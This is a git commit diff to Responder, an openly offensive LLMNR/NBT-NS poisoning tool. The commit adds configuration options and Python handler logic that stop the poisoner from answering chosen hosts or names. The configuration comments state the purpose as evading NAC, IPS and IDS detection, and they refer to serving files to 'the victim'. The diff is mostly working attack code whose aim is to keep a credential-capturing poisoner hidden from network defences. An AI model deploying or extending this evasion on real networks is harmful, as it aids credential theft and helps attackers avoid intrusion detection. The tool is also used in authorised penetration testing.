Added: DontRespondToName and DontRespondTo; NAC/IPS detection evasion

2025-07-16 10:02:53 -07:00 · 2014-11-27 18:36:33 -05:00 · 2014-11-27 18:36:33 -05:00 · 36ef78f85a
commit 36ef78f85a
parent c05bdfce17
2 changed files with 106 additions and 70 deletions
--- a/Responder.conf
+++ b/Responder.conf
@ -27,6 +27,11 @@ RespondTo =
 ;RespondTo = WPAD,DEV,PROD,SQLINT
 RespondToName = 
 ;
+;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
+DontRespondTo = 
+;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
+DontRespondToName =
+;
 [HTTP Server]
 ;;
 ;Set this to On if you want to always serve a specific file to the victim.
--- a/Responder.py
+++ b/Responder.py
@ -85,6 +85,10 @@ RespondTo = config.get('Responder Core', 'RespondTo').strip()
 RespondTo.split(",")
 RespondToName = config.get('Responder Core', 'RespondToName').strip()
 RespondToName.split(",")
+DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
+DontRespondTo.split(",")
+DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
+DontRespondToName.split(",")
 #Cli options.
 OURIP = options.OURIP
 LM_On_Off = options.LM_On_Off
@ -261,7 +265,30 @@ def RespondToNameScope(RespondToName, Name):
    else:
        return False

+##Dont Respond to these hosts/names.
+def DontRespondToSpecificHost(DontRespondTo):
+    if len(DontRespondTo)>=1 and DontRespondTo != ['']:
+        return True
+    else:
+        return False

+def DontRespondToSpecificName(DontRespondToName):
+    if len(DontRespondToName)>=1 and DontRespondToName != ['']:
+        return True
+    else:
+        return False
+
+def DontRespondToIPScope(DontRespondTo, ClientIp):
+    if ClientIp in DontRespondTo:
+        return True
+    else:
+        return False
+
+def DontRespondToNameScope(DontRespondToName, Name):
+    if Name in DontRespondToName:
+        return True
+    else:
+        return False
 ##################################################################################
 #NBT NS Stuff
 ##################################################################################
@ -344,6 +371,13 @@ class NB(BaseRequestHandler):
        data, socket = self.request
        Name = Decode_Name(data[13:45])

+        if DontRespondToSpecificHost(DontRespondTo):
+            if RespondToIPScope(DontRespondTo, self.client_address[0]):
+                return None
+
+        if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
+            return None 
+
        if Analyze(AnalyzeMode):
            if data[2:4] == "\x01\x10":
                if Is_Finger_On(Finger_On_Off):
@ -1268,10 +1302,10 @@ class LLMNR(BaseRequestHandler):
    def handle(self):
        data, soc = self.request
        try:
-            if Analyze(AnalyzeMode):
            if data[2:4] == "\x00\x00":
                if Parse_IPV6_Addr(data):
                    Name = Parse_LLMNR_Name(data)
+                    if Analyze(AnalyzeMode):
                        if Is_Finger_On(Finger_On_Off):
                            try:
                                Finger = RunSmbFinger((self.client_address[0],445))
@ -1288,12 +1322,16 @@ class LLMNR(BaseRequestHandler):
                                print Message
                                logger3.warning(Message)

+                    if DontRespondToSpecificHost(DontRespondTo):
+                        if RespondToIPScope(DontRespondTo, self.client_address[0]):
+                            return None
+
+                    if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
+                        return None 
+
                    if RespondToSpecificHost(RespondTo):
                        if Analyze(AnalyzeMode) == False:
                            if RespondToIPScope(RespondTo, self.client_address[0]):
-                        if data[2:4] == "\x00\x00":
-                            if Parse_IPV6_Addr(data):
-                                Name = Parse_LLMNR_Name(data)
                                if RespondToSpecificName(RespondToName) == False:
                                    buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
                                    buff.calculate()
@ -1335,13 +1373,8 @@ class LLMNR(BaseRequestHandler):
                                            except Exception:
                                                logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
                                                pass
-                        else:
-                            pass

                    if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
-                if data[2:4] == "\x00\x00":
-                    if Parse_IPV6_Addr(data):
-                        Name = Parse_LLMNR_Name(data)
                        if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
                            buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
                            buff.calculate()
@ -2542,5 +2575,3 @@ if __name__ == '__main__':
        main()
    except:
        raise
-
-